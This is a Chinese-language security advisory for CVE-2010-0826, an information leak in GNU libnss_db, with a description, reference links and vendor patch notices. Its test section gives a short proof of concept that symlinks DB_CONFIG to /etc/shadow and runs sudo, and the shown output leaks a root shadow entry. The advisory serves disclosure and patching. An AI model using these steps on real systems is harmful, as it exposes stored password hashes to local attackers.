发布日期：2010-03-31
更新日期：2010-04-16

受影响系统：

GNU libnss_db 2.2.3

描述：

---

BUGTRAQ  ID: 39132
CVE ID: CVE-2010-0826

nss_db软件包提供了一套C库扩展，允许将Berkeley DB数据库用作别名、组、主机、网络、协议、用户、RPC、服务和影子口令的主来源。

nss_db库在遇到解析错误时可能会显示DB_CONFIG文件的某些内容，本地用户可以通过将DB_CONFIG符号链接到受限制的文件上然后执行使用该库的suid root应用程序来读取敏感信息。

<*来源：Stephane Chazelas
  
  链接：https://bugs.launchpad.net/ubuntu/+source/libnss-db/+bug/531976
        https://www.redhat.com/support/errata/RHSA-2010-0347.html
        https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-March/001069.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

sudo apt-get install libnss-db
sudo /etc/init.d/nscd stop (in case nscd is installed)
sudo ln -s /etc/shadow DB_CONFIG
$ sudo
line 1: root:*:14553:0:99999:7:::: incorrect name-value pair
[...]

建议：

---

厂商补丁：

GNU
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

https://bugs.launchpad.net/ubuntu/+source/libnss-db/+bug/531976

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2010:0347-01）以及相应补丁:
RHSA-2010:0347-01：Moderate: nss_db security update
链接：https://www.redhat.com/support/errata/RHSA-2010-0347.html

Ubuntu
------
Ubuntu已经为此发布了一个安全公告（USN-922-1）以及相应补丁:
USN-922-1：libnss-db vulnerability
链接：https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-March/001069.html

浏览次数：2284
严重程度：0（网友投票）